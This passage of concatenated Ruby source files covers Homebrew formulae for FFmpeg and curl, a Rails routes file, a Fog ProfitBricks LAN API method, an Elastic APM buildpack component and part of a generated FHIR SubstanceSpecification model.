          evaluate_nodes(*evaluate_args, &block)
        )
      end
      register(name, options[:private])
    end

    # Returns an array of symbols containing all method names defined by node builder methods
    # in your class.
    def nodes
      @nodes ||= []
    end

    # Returns an array of symbols containing all method names defined by node builder methods
    # in your class. Does not list nodes built with option `:private`.
    def public_nodes
      @public_nodes ||= []
    end

    def parsing_type?
      false
    end

    private

    # Records a node under `@nodes`, and under `@public_nodes` unless the
    # node was declared private.
    def register(node_name, privateness)
      @nodes ||= []
      @nodes << node_name.to_sym
      @public_nodes ||= []
      @public_nodes << node_name.to_sym unless privateness
    end
  end
end
| 30.770115 | 95 | 0.663056 |
393c04de0c5c9c933efa29b3c9772e43150f7adb | 4,532 | class Ffmpeg < Formula
desc "Play, record, convert, and stream audio and video"
homepage "https://ffmpeg.org/"
url "https://ffmpeg.org/releases/ffmpeg-4.4.1.tar.xz"
sha256 "eadbad9e9ab30b25f5520fbfde99fae4a92a1ae3c0257a8d68569a4651e30e02"
# None of these parts are used by default, you have to explicitly pass `--enable-gpl`
# to configure to activate them. In this case, FFmpeg's license changes to GPL v2+.
license "GPL-2.0-or-later"
revision 3
head "https://github.com/FFmpeg/FFmpeg.git"

livecheck do
  url "https://ffmpeg.org/download.html"
  regex(/href=.*?ffmpeg[._-]v?(\d+(?:\.\d+)+)\.t/i)
end

bottle do
  sha256 arm64_monterey: "3f0fd439dab73037bf1577aeef75fe61693a8c7d231db15355685aa27d998503"
  sha256 arm64_big_sur: "595897c60fd28be047977306a35e53fc6f6f29b021af7b0ee542719bf892eca4"
  sha256 monterey: "d86a545fd61b459c1adafcec61bf1803f8f632fe527a88682af4fb89c37056fd"
  sha256 big_sur: "b3e866d21b8a51653e294e08c8be65e5095894f52f6cb6b914025992191c1c50"
  sha256 catalina: "ea2431a650ae91eb8ea197d7e1d8e82f50d5dfdaad08a0da7c067609e8b1922f"
  sha256 x86_64_linux: "a91fa175c2f2a47c9afd240bf2cf97064b14647077be5804da159b6a4244fe62"
end

depends_on "nasm" => :build
depends_on "pkg-config" => :build
depends_on "aom"
depends_on "dav1d"
depends_on "fontconfig"
depends_on "freetype"
depends_on "frei0r"
depends_on "gnutls"
depends_on "lame"
depends_on "libass"
depends_on "libbluray"
depends_on "librist"
depends_on "libsoxr"
depends_on "libvidstab"
depends_on "libvmaf"
depends_on "libvorbis"
# NOTE(review): fdk-aac pairs with the `--enable-nonfree` configure flag
# below — presumably this is a deliberately non-redistributable build;
# confirm before publishing bottles.
depends_on "fdk-aac"
depends_on "libvpx"
depends_on "opencore-amr"
depends_on "openjpeg"
depends_on "opus"
depends_on "rav1e"
depends_on "rubberband"
depends_on "sdl2"
depends_on "snappy"
depends_on "speex"
depends_on "srt"
depends_on "tesseract"
depends_on "theora"
depends_on "webp"
depends_on "x264"
depends_on "x265"
depends_on "xvid"
depends_on "xz"
depends_on "zeromq"
depends_on "zimg"

uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "zlib"

on_linux do
  depends_on "libxv"
end

def install
  args = %W[
    --prefix=#{prefix}
    --enable-shared
    --enable-pthreads
    --enable-version3
    --cc=#{ENV.cc}
    --host-cflags=#{ENV.cflags}
    --host-ldflags=#{ENV.ldflags}
    --enable-ffplay
    --enable-gnutls
    --enable-gpl
    --enable-libaom
    --enable-libbluray
    --enable-libdav1d
    --enable-libmp3lame
    --enable-libopus
    --enable-librav1e
    --enable-librist
    --enable-librubberband
    --enable-libsnappy
    --enable-libsrt
    --enable-libtesseract
    --enable-libtheora
    --enable-libvidstab
    --enable-libvmaf
    --enable-libvorbis
    --enable-libfdk-aac
    --enable-libvpx
    --enable-libwebp
    --enable-libx264
    --enable-libx265
    --enable-libxml2
    --enable-libxvid
    --enable-lzma
    --enable-libfontconfig
    --enable-libfreetype
    --enable-frei0r
    --enable-libass
    --enable-libopencore-amrnb
    --enable-libopencore-amrwb
    --enable-libopenjpeg
    --enable-libspeex
    --enable-libsoxr
    --enable-libzmq
    --enable-libzimg
    --disable-libjack
    --disable-indev=jack
    --enable-nonfree
  ]

  # libavresample has been deprecated and removed but some non-updated formulae are still linked to it
  # Remove in the next release
  args << "--enable-avresample" unless build.head?

  # Needs corefoundation, coremedia, corevideo
  args << "--enable-videotoolbox" if OS.mac?

  # Replace hardcoded default VMAF model path
  %w[doc/filters.texi libavfilter/vf_libvmaf.c].each do |f|
    inreplace f, "/usr/local/share/model", HOMEBREW_PREFIX/"share/libvmaf/model"
    # Since libvmaf v2.0.0, `.pkl` model files have been deprecated in favor of `.json` model files.
    inreplace f, "vmaf_v0.6.1.pkl", "vmaf_v0.6.1.json"
  end

  system "./configure", *args
  system "make", "install"

  # Build and install additional FFmpeg tools
  system "make", "alltools"
  bin.install Dir["tools/*"].select { |f| File.executable? f }

  # Fix for Non-executables that were installed to bin/
  mv bin/"python", pkgshare/"python", force: true
end

test do
  # Create an example mp4 file
  mp4out = testpath/"video.mp4"
  system bin/"ffmpeg", "-filter_complex", "testsrc=rate=1:duration=1", mp4out
  assert_predicate mp4out, :exist?
end
end
| 29.428571 | 104 | 0.684907 |
b9f63f1a09e8b639197e6d4f5dd6d1ad11d86ee1 | 133 | class Post < ActiveRecord::Base
# Remember to create a migration!
# Associations: a post is authored by a user, belongs to a ticket thread,
# and can receive many comments.
belongs_to :user
belongs_to :ticket
has_many :comments
end
| 19 | 35 | 0.75188 |
28d9ce6371ee517948da0baf535a41db3d45b7bb | 4,804 | class Phpcurl < Formula
desc "Get a file from an HTTP, HTTPS or FTP server"
homepage "https://curl.haxx.se/"
url "https://curl.haxx.se/download/curl-7.72.0.tar.bz2"
mirror "http://curl.mirror.anstey.ca/curl-7.72.0.tar.bz2"
sha256 "ad91970864102a59765e20ce16216efc9d6ad381471f7accceceab7d905703ef"
version '7.72.0'
revision 2
pour_bottle? do
reason "The bottle needs to be installed into #{Homebrew::DEFAULT_PREFIX} when built with OpenSSL."
satisfy { OS.mac? || HOMEBREW_PREFIX.to_s == Homebrew::DEFAULT_PREFIX }
end
head do
url "https://github.com/curl/curl.git"
depends_on "[email protected]" => :build
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
keg_only "php only dependency"
option "with-rtmpdump", "Build with RTMP support"
option "with-libssh2", "Build with scp and sftp support"
option "with-c-ares", "Build with C-Ares async DNS support"
option "with-gssapi", "Build with GSSAPI/Kerberos authentication support."
option "with-libmetalink", "Build with libmetalink support."
option "with-nghttp2", "Build with HTTP/2 support (requires OpenSSL)"
deprecated_option "with-rtmp" => "with-rtmpdump"
deprecated_option "with-ssh" => "with-libssh2"
deprecated_option "with-ares" => "with-c-ares"
# HTTP/2 support requires OpenSSL 1.0.2+ or LibreSSL 2.1.3+ for ALPN Support
# which is currently not supported by Secure Transport (DarwinSSL).
# if MacOS.version < :mountain_lion || build.with?("nghttp2") || build.with?("openssl")
# depends_on "[email protected]"
# else
# option "with-openssl", "Build with OpenSSL instead of Secure Transport"
# depends_on "[email protected]" => :optional
# end
depends_on "[email protected]"
depends_on "pkg-config" => :build
depends_on "gcc@9" => :build
depends_on "c-ares" => :optional
depends_on "libmetalink" => :optional
depends_on "libssh2" => :optional
depends_on "nghttp2" => :optional
depends_on "rtmpdump" => :optional
unless OS.mac?
depends_on "krb5" if build.with? "gssapi"
depends_on "openldap" => :optional
end
ENV['CFLAGS'] = '-I$(brew --prefix [email protected])/include'
ENV['LDFLAGS'] = '-L$(brew --prefix [email protected])/lib'
# Builds and installs curl from source.
#
# The toolchain is pinned to GCC 9 and TLS is always provided by
# [email protected] (the historical Secure Transport fallback was dropped).
# Optional protocol features are toggled through the corresponding
# formula options.
def install
  gcc_home = Formula["gcc@9"].opt_prefix
  ENV["CC"] = "#{gcc_home}/bin/gcc-9"
  ENV["CXX"] = "#{gcc_home}/bin/g++-9"

  # HEAD checkouts ship no configure script; generate one first.
  system "./buildconf" if build.head?

  # Allow building on Lion by lowering the deployment target from the
  # upstream default of 10.8.
  ENV.append_to_cflags "-mmacosx-version-min=10.7" if MacOS.version <= :lion && OS.mac?

  configure_args = %W[
    --disable-debug
    --disable-dependency-tracking
    --disable-silent-rules
    --prefix=#{prefix}
    --with-ssl=#{Formula["[email protected]"].opt_prefix}
    --with-ca-bundle=#{etc}/[email protected]/cert.pem
    --with-ca-path=#{etc}/[email protected]/certs
  ]

  # Features that follow the plain --with-X / --without-X pattern.
  {
    "libssh2" => "libssh2",
    "libmetalink" => "libmetalink",
    "gssapi" => "gssapi",
    "rtmpdump" => "librtmp",
  }.each do |option_name, flag|
    configure_args << (build.with?(option_name) ? "--with-#{flag}" : "--without-#{flag}")
  end

  # c-ares needs its formula prefix when enabled, so it cannot use the
  # simple with/without pattern above.
  if build.with? "c-ares"
    configure_args << "--enable-ares=#{Formula["c-ares"].opt_prefix}"
  else
    configure_args << "--disable-ares"
  end

  configure_args << "--disable-ldap" if build.without? "openldap"

  system "./configure", *configure_args
  system "make", "install"
  system "make", "install", "-C", "scripts"
  libexec.install "lib/mk-ca-bundle.pl"
end
# Smoke test: download the release tarball with the freshly built curl and
# verify its checksum (needs a network connection, but so does Homebrew in
# general), then exercise the bundled mk-ca-bundle.pl script.
test do
  tarball = testpath/"test.tar.gz"
  system "#{bin}/curl", "-L", stable.url, "-o", tarball
  tarball.verify_checksum stable.checksum

  system libexec/"mk-ca-bundle.pl", "test.pem"
  %w[test.pem certdata.txt].each do |produced|
    assert_predicate testpath/produced, :exist?
  end
end
end
| 38.432 | 103 | 0.650291 |
# frozen_string_literal: true

# Cloud Foundry Java Buildpack
# Copyright 2013-2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'

module JavaBuildpack
  module Framework

    # Encapsulates the functionality for enabling zero-touch Elastic APM support.
    # Activates when a bound service matching FILTER provides both server_urls
    # and secret_token credentials.
    class ElasticApmAgent < JavaBuildpack::Component::VersionedDependencyComponent

      # (see JavaBuildpack::Component::BaseComponent#compile)
      def compile
        download_jar
      end

      # Configures the Elastic APM javaagent: merges buildpack defaults with the
      # bound service's credentials, emits each entry as an elastic.apm.* system
      # property, and attaches the agent jar.
      #
      # (see JavaBuildpack::Component::BaseComponent#release)
      def release
        credentials = @application.services.find_service(FILTER, [SERVER_URLS, SECRET_TOKEN])['credentials']
        java_opts = @droplet.java_opts
        configuration = {}

        apply_configuration(credentials, configuration)
        apply_user_configuration(credentials, configuration)
        write_java_opts(java_opts, configuration)

        java_opts.add_javaagent(@droplet.sandbox + jar_name)
                 .add_system_property("#{BASE_KEY}home", @droplet.sandbox)
      end

      protected

      # (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
      def supports?
        @application.services.one_service? FILTER, [SERVER_URLS, SECRET_TOKEN]
      end

      private

      FILTER = /elastic-apm/.freeze

      # Prefix shared by every Elastic APM system property.
      BASE_KEY = 'elastic.apm.'

      SERVER_URLS = 'server_urls'
      SECRET_TOKEN = 'secret_token'
      SERVICE_NAME = 'service_name'

      # SERVICE_NAME was previously omitted from this list; all internal
      # constants are now consistently private.
      private_constant :FILTER, :BASE_KEY, :SERVER_URLS, :SECRET_TOKEN, :SERVICE_NAME

      # Seeds the configuration with buildpack-controlled defaults: log to
      # STDOUT, the service's server URLs/token, and the CF application name.
      def apply_configuration(credentials, configuration)
        configuration['log_file_name'] = 'STDOUT'
        configuration[SERVER_URLS] = credentials[SERVER_URLS]
        configuration[SECRET_TOKEN] = credentials[SECRET_TOKEN]
        configuration[SERVICE_NAME] = @application.details['application_name']
      end

      # Copies every credential from the service binding into the
      # configuration, letting user-supplied values override the defaults
      # applied above.
      def apply_user_configuration(credentials, configuration)
        credentials.each do |key, value|
          configuration[key] = value
        end
      end

      # Emits each configuration entry as an elastic.apm.<key> system property.
      def write_java_opts(java_opts, configuration)
        configuration.each do |key, value|
          java_opts.add_system_property("#{BASE_KEY}#{key}", value)
        end
      end

    end
  end
end
| 36.333333 | 119 | 0.700862 |
Threadable::Application.routes.draw do
# NOTE: Rails matches routes top to bottom, so ordering here is significant —
# in particular the catch-alls near the bottom must stay last.

# Authentication and password recovery.
get '/sign_in' => 'authentication#show'
post '/sign_in' => 'authentication#sign_in'
post '/recover-password' => 'authentication#recover_password', as: 'recover_password'
match '/sign_out' => 'authentication#sign_out', via: [:get, :delete], as: 'sign_out'
# Sign-up and email-token confirmation.
post '/sign_up' => 'sign_up#sign_up'
match '/sign_up/confirmation/:token' => 'sign_up#confirmation', via: [:get, :post], as: 'sign_up_confirmation'
# Organization creation.
get '/create' => 'organizations#new', as: 'new_organization'
post '/create' => 'organizations#create'
# Tokenized one-click actions triggered from emails.
get '/ea/:token' => 'email_actions#show', as: 'email_action'
post '/ea/:token' => 'email_actions#take'
# Billing/subscription flow.
get '/subscribe/:organization_id' => 'subscribe#show', as: 'subscribe'
get '/subscribe/wait/:organization_id' => 'subscribe#wait', as: 'subscribe_wait'
post '/subscribe/callback' => 'subscribe#callback', as: 'subscribe_callback'
# JSON API consumed by the client application.
namespace :api, except: [:new, :edit] do
scope :users do
resource :current, controller: 'current_user', only: [:show, :update]
end
# NOTE(review): :claim_google_account in the only: list is not a RESTful
# action name — presumably harmless, but confirm it is intentional.
resources :organizations, only: [:index, :show, :update, :claim_google_account] do
post :claim_google_account
end
resources :email_domains, only: [:index, :create, :update, :destroy]
resources :groups do
post :join
post :leave
end
resources :conversations do
get :search, on: :collection
member do
post :sync
end
end
resources :tasks
resources :messages
resources :events
resources :conversation_details, only: [:show]
# NOTE(review): same oddity as above — :resend_invitation in only:.
resources :organization_members, only: [:index, :create, :update, :destroy, :resend_invitation] do
post :resend_invitation
end
resources :group_members, only: [:index, :create, :update, :destroy]
resources :task_doers
end
# OAuth provider callback.
get '/auth/:provider/callback', to: 'external_auth#create'
# OLD ROUTES START
# Admin console (access restricted via AdminConstraint below).
get '/admin' => 'admin#show'
namespace :admin do
get 'profiler' => 'profiler#show'
get 'debug' => 'debug#show'
get 'debug/enable' => 'debug#enable'
get 'debug/disable' => 'debug#disable'
post 'organizations/:organization_id/members' => 'organization/members#add', as: 'add_organization_member'
get 'organizations/:organization_id/members/:user_id/edit' => 'organization/members#edit', as: 'edit_organization_member'
patch 'organizations/:organization_id/members/:user_id' => 'organization/members#update', as: 'update_organization_member'
delete 'organizations/:organization_id/members/:user_id' => 'organization/members#remove', as: 'remove_organization_member'
get 'organizations' => 'organizations#index', as: 'organizations'
post 'organizations' => 'organizations#create'
get 'organizations/new' => 'organizations#new', as: 'new_organization'
get 'organizations/:id/edit' => 'organizations#edit', as: 'edit_organization'
patch 'organizations/:id' => 'organizations#update', as: 'organization'
delete 'organizations/:id' => 'organizations#destroy'
get 'users' => 'users#index', as: 'users'
get 'users/emails' => 'users#emails', as: 'user_emails'
get 'users/:user_id' => 'users#show', as: 'user'
get 'users/:user_id/edit' => 'users#edit', as: 'edit_user'
post 'users/:user_id/merge' => 'users#merge', as: 'merge_user'
patch 'users/:user_id' => 'users#update', as: 'update_user'
get 'incoming_emails' => 'incoming_emails#index', as: 'incoming_emails'
get 'incoming_emails/:id' => 'incoming_emails#show', as: 'incoming_email'
post 'incoming_emails/:id/retry' => 'incoming_emails#retry', as: 'retry_incoming_email'
get 'outgoing_emails' => 'outgoing_emails#edit', as: 'outgoing_emails'
post 'outgoing_emails/retry' => 'outgoing_emails#retry', as: 'retry_outgoing_email'
# Admin-only Rack apps (Sidekiq dashboard, mail previews).
constraints AdminConstraint.new do
require 'sidekiq/web'
mount Sidekiq::Web => '/background_jobs'
mount MailPreview => '/mail_preview' if defined?(MailView)
end
# Unknown admin paths bounce back to the admin root.
get '/*anything', to: redirect('/admin')
end
# OLD ROUTES (continued — this marker was a duplicated "START" in the original)
get '/reset_password/confirm_organizations' => 'users/reset_password#confirm_organizations', as: 'confirm_organizations'
get '/reset_password/:token' => 'users/reset_password#show', as: 'reset_password'
patch '/reset_password/:token' => 'users/reset_password#reset'
post '/reset_password' => 'users/reset_password#request_link', as: 'request_reset_password_link'
resources :users, except: [:new, :destroy] do
collection do
get 'setup/:token' => 'users/setup#edit', as: 'setup'
patch 'setup/:token' => 'users/setup#update'
end
end
get '/profile' => 'profile#show'
patch '/profile' => 'profile#update'
post '/email_addresses' => 'email_addresses#create', as: 'email_addresses'
patch '/email_addresses' => 'email_addresses#update', as: 'email_address'
post '/email_addresses/resend_confirmation_email' => 'email_addresses#resend_confirmation_email', as: 'resend_email_address_confirmation'
match '/email_addresses/confirm/:token' => 'email_addresses#confirm', as: 'confirm_email_address', via: [:get, :post]
post '/api_access_tokens' => 'api_access_tokens#create', as: 'api_access_tokens'
# Organization-scoped moderation and email-subscription endpoints.
scope '/:organization_id', :as => 'organization' do
resources :held_messages, :only => [:index, :show], controller: 'organization/held_messages' do
post :accept, on: :member
post :reject, on: :member
end
match '/unsubscribe/:token' => 'organization/email_subscriptions#unsubscribe', as: 'unsubscribe', via: [:get, :post]
match '/resubscribe/:token' => 'organization/email_subscriptions#resubscribe', as: 'resubscribe', via: [:get, :post]
end
# Inbound email webhooks.
resources :emails, :only => :create
resources :mailgun_events, :only => :create
# Legacy URL shapes redirected/kept for old email links.
get '/:organization_id/conversations/:conversation_id', to: redirect('/%{organization_id}/my/conversations/%{conversation_id}')
get '/:organization_id/tasks/:conversation_id', to: redirect('/%{organization_id}/my/tasks/%{conversation_id}')
get '/:organization_id/tasks/:conversation_id/ill_do_it' => 'old_email_actions#ill_do_it'
get '/:organization_id/tasks/:conversation_id/remove_me' => 'old_email_actions#remove_me'
get '/:organization_id/tasks/:conversation_id/mark_as_done' => 'old_email_actions#mark_as_done'
get '/:organization_id/tasks/:conversation_id/mark_as_undone' => 'old_email_actions#mark_as_undone'
get '/:organization_id/conversations/:conversation_id/mute' => 'old_email_actions#mute'
# OLD ROUTES END
# load the ember app, handle requests to /organization_slug
get '/frontpage' => 'homepage#show'
get '/pricing' => 'homepage#pricing'
get '/pro' => 'homepage#pricing'
post '/sign_up/:organization_id' => 'sign_up#create', as: 'organization_join'
get '/:organization_id' => 'sign_up#show'
# Catch-all: everything else is handled by the client-side app. Must stay
# below every other route.
get '/*path' => 'client_app#show'
root to: 'homepage#show'
end
| 46.782051 | 140 | 0.657714 |
module Fog
  module Compute
    class ProfitBricks
      class Real
        # Updates the properties of an existing LAN.
        #
        # ==== Parameters
        # * datacenter_id<~String> - Required - UUID of the virtual data center
        # * lan_id<~String>        - Required - UUID of the LAN
        # * options<~Hash>         - Properties to change:
        #   * name<~String>    - The name of the LAN
        #   * public<~Boolean> - Whether the LAN faces the public Internet
        #
        # ==== Returns
        # * response<~Excon::Response> (status 202) whose body is the updated
        #   LAN representation: id, type, href, metadata (createdDate,
        #   createdBy, etag, lastModifiedDate, lastModifiedBy, state),
        #   properties (name, public, ipFailover) and, where present, the
        #   nested NIC entities including their firewall rules.
        #
        # {ProfitBricks API Documentation}[https://devops.profitbricks.com/api/cloud/v2/#update-lan]
        def update_lan(datacenter_id, lan_id, options = {})
          request(
            :expects => [202],
            :method  => 'PATCH',
            :path    => "/datacenters/#{datacenter_id}/lans/#{lan_id}",
            :body    => Fog::JSON.encode(options)
          )
        end
      end

      class Mock
        # In-memory double of Real#update_lan: mutates the stored LAN record
        # and returns it wrapped in a 202 response, or raises NotFound when no
        # LAN matches the given datacenter/LAN ids.
        def update_lan(datacenter_id, lan_id, options = {})
          lan = data[:lans]['items'].find do |item|
            item['datacenter_id'] == datacenter_id && item['id'] == lan_id
          end
          raise Fog::Errors::NotFound, 'The requested LAN resource could not be found' unless lan

          options.each { |key, value| lan[key] = value }

          response = Excon::Response.new
          response.status = 202
          response.body = lan
          response
        end
      end
    end
  end
end
| 68.563492 | 144 | 0.492881 |
# Persists a per-round snapshot of a building's elevator and floor state.
class PersistorService
  # Creates a new Round and stores the building's current state against it:
  # one entry per elevator (position, load, totals) and one per floor
  # (queue length).
  def self.store_state(building)
    BuildingState.create!(
      round: Round.new,
      state_data: {
        elevators: building.elevators.map { |lift| elevator_snapshot(lift) },
        floors: building.floors.map { |floor| { people_waiting: floor.people.count } }
      }
    )
  end

  # Serializable hash describing a single elevator at this instant.
  def self.elevator_snapshot(elevator)
    {
      floor_number: elevator.floor_number,
      people_carrying: elevator.people.count,
      people_transported: elevator.statistics
    }
  end
  private_class_method :elevator_snapshot
end
| 40.238095 | 77 | 0.369231 |
5d2d292165b1f06432a9d81d4c8be4a65d1929ac | 25,029 | module FHIR
class SubstanceSpecification < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
SEARCH_PARAMS = ['code']
METADATA = {
'id' => {'type'=>'id', 'path'=>'SubstanceSpecification.id', 'min'=>0, 'max'=>1},
'meta' => {'type'=>'Meta', 'path'=>'SubstanceSpecification.meta', 'min'=>0, 'max'=>1},
'implicitRules' => {'type'=>'uri', 'path'=>'SubstanceSpecification.implicitRules', 'min'=>0, 'max'=>1},
'language' => {'valid_codes'=>{'urn:ietf:bcp:47'=>['ar', 'bn', 'cs', 'da', 'de', 'de-AT', 'de-CH', 'de-DE', 'el', 'en', 'en-AU', 'en-CA', 'en-GB', 'en-IN', 'en-NZ', 'en-SG', 'en-US', 'es', 'es-AR', 'es-ES', 'es-UY', 'fi', 'fr', 'fr-BE', 'fr-CH', 'fr-FR', 'fy', 'fy-NL', 'hi', 'hr', 'it', 'it-CH', 'it-IT', 'ja', 'ko', 'nl', 'nl-BE', 'nl-NL', 'no', 'no-NO', 'pa', 'pl', 'pt', 'pt-BR', 'ru', 'ru-RU', 'sr', 'sr-RS', 'sv', 'sv-SE', 'te', 'zh', 'zh-CN', 'zh-HK', 'zh-SG', 'zh-TW']}, 'type'=>'code', 'path'=>'SubstanceSpecification.language', 'min'=>0, 'max'=>1, 'binding'=>{'strength'=>'preferred', 'uri'=>'http://hl7.org/fhir/ValueSet/languages'}},
'text' => {'type'=>'Narrative', 'path'=>'SubstanceSpecification.text', 'min'=>0, 'max'=>1},
'contained' => {'type'=>'Resource', 'path'=>'SubstanceSpecification.contained', 'min'=>0, 'max'=>Float::INFINITY},
'extension' => {'type'=>'Extension', 'path'=>'SubstanceSpecification.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'SubstanceSpecification.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'identifier' => {'type'=>'Identifier', 'path'=>'SubstanceSpecification.identifier', 'min'=>0, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.type', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.status', 'min'=>0, 'max'=>1},
'domain' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.domain', 'min'=>0, 'max'=>1},
'description' => {'type'=>'string', 'path'=>'SubstanceSpecification.description', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.source', 'min'=>0, 'max'=>Float::INFINITY},
'comment' => {'type'=>'string', 'path'=>'SubstanceSpecification.comment', 'min'=>0, 'max'=>1},
'moiety' => {'type'=>'SubstanceSpecification::Moiety', 'path'=>'SubstanceSpecification.moiety', 'min'=>0, 'max'=>Float::INFINITY},
'property' => {'type'=>'SubstanceSpecification::Property', 'path'=>'SubstanceSpecification.property', 'min'=>0, 'max'=>Float::INFINITY},
'referenceInformation' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceReferenceInformation'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.referenceInformation', 'min'=>0, 'max'=>1},
'structure' => {'type'=>'SubstanceSpecification::Structure', 'path'=>'SubstanceSpecification.structure', 'min'=>0, 'max'=>1},
'code' => {'type'=>'SubstanceSpecification::Code', 'path'=>'SubstanceSpecification.code', 'min'=>0, 'max'=>Float::INFINITY},
'name' => {'type'=>'SubstanceSpecification::Name', 'path'=>'SubstanceSpecification.name', 'min'=>0, 'max'=>Float::INFINITY},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'SubstanceSpecification.molecularWeight', 'min'=>0, 'max'=>Float::INFINITY},
'relationship' => {'type'=>'SubstanceSpecification::Relationship', 'path'=>'SubstanceSpecification.relationship', 'min'=>0, 'max'=>Float::INFINITY},
'nucleicAcid' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceNucleicAcid'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.nucleicAcid', 'min'=>0, 'max'=>1},
'polymer' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstancePolymer'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.polymer', 'min'=>0, 'max'=>1},
'protein' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceProtein'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.protein', 'min'=>0, 'max'=>1},
'sourceMaterial' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSourceMaterial'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.sourceMaterial', 'min'=>0, 'max'=>1}
}
# Model for SubstanceSpecification.moiety (appears auto-generated from the
# FHIR R4 definitions — prefer regenerating over hand-editing).
# METADATA drives the FHIR::Hashable/Json/Xml (de)serialization mixins.
class Moiety < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
# Choice-type ([x]) elements and their permitted datatypes.
MULTIPLE_TYPES = {
'amount' => ['Quantity', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Moiety.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Moiety.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Moiety.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'role' => {'type'=>'CodeableConcept', 'path'=>'Moiety.role', 'min'=>0, 'max'=>1},
'identifier' => {'type'=>'Identifier', 'path'=>'Moiety.identifier', 'min'=>0, 'max'=>1},
'name' => {'type'=>'string', 'path'=>'Moiety.name', 'min'=>0, 'max'=>1},
'stereochemistry' => {'type'=>'CodeableConcept', 'path'=>'Moiety.stereochemistry', 'min'=>0, 'max'=>1},
'opticalActivity' => {'type'=>'CodeableConcept', 'path'=>'Moiety.opticalActivity', 'min'=>0, 'max'=>1},
'molecularFormula' => {'type'=>'string', 'path'=>'Moiety.molecularFormula', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Moiety.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Moiety.amount[x]', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :role # 0-1 CodeableConcept
attr_accessor :identifier # 0-1 Identifier
attr_accessor :name # 0-1 string
attr_accessor :stereochemistry # 0-1 CodeableConcept
attr_accessor :opticalActivity # 0-1 CodeableConcept
attr_accessor :molecularFormula # 0-1 string
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountString # 0-1 string
end
# Model for SubstanceSpecification.property (appears auto-generated from the
# FHIR R4 definitions — prefer regenerating over hand-editing).
class Property < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
# Choice-type ([x]) elements and their permitted datatypes.
MULTIPLE_TYPES = {
'definingSubstance' => ['Reference', 'CodeableConcept'],
'amount' => ['Quantity', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Property.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Property.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Property.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'category' => {'type'=>'CodeableConcept', 'path'=>'Property.category', 'min'=>0, 'max'=>1},
'code' => {'type'=>'CodeableConcept', 'path'=>'Property.code', 'min'=>0, 'max'=>1},
'parameters' => {'type'=>'string', 'path'=>'Property.parameters', 'min'=>0, 'max'=>1},
'definingSubstanceReference' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSpecification', 'http://hl7.org/fhir/StructureDefinition/Substance'], 'type'=>'Reference', 'path'=>'Property.definingSubstance[x]', 'min'=>0, 'max'=>1},
'definingSubstanceCodeableConcept' => {'type'=>'CodeableConcept', 'path'=>'Property.definingSubstance[x]', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Property.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Property.amount[x]', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :category # 0-1 CodeableConcept
attr_accessor :code # 0-1 CodeableConcept
attr_accessor :parameters # 0-1 string
attr_accessor :definingSubstanceReference # 0-1 Reference(SubstanceSpecification|Substance)
attr_accessor :definingSubstanceCodeableConcept # 0-1 CodeableConcept
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountString # 0-1 string
end
# Model for SubstanceSpecification.structure (appears auto-generated from the
# FHIR R4 definitions — prefer regenerating over hand-editing). Nests the
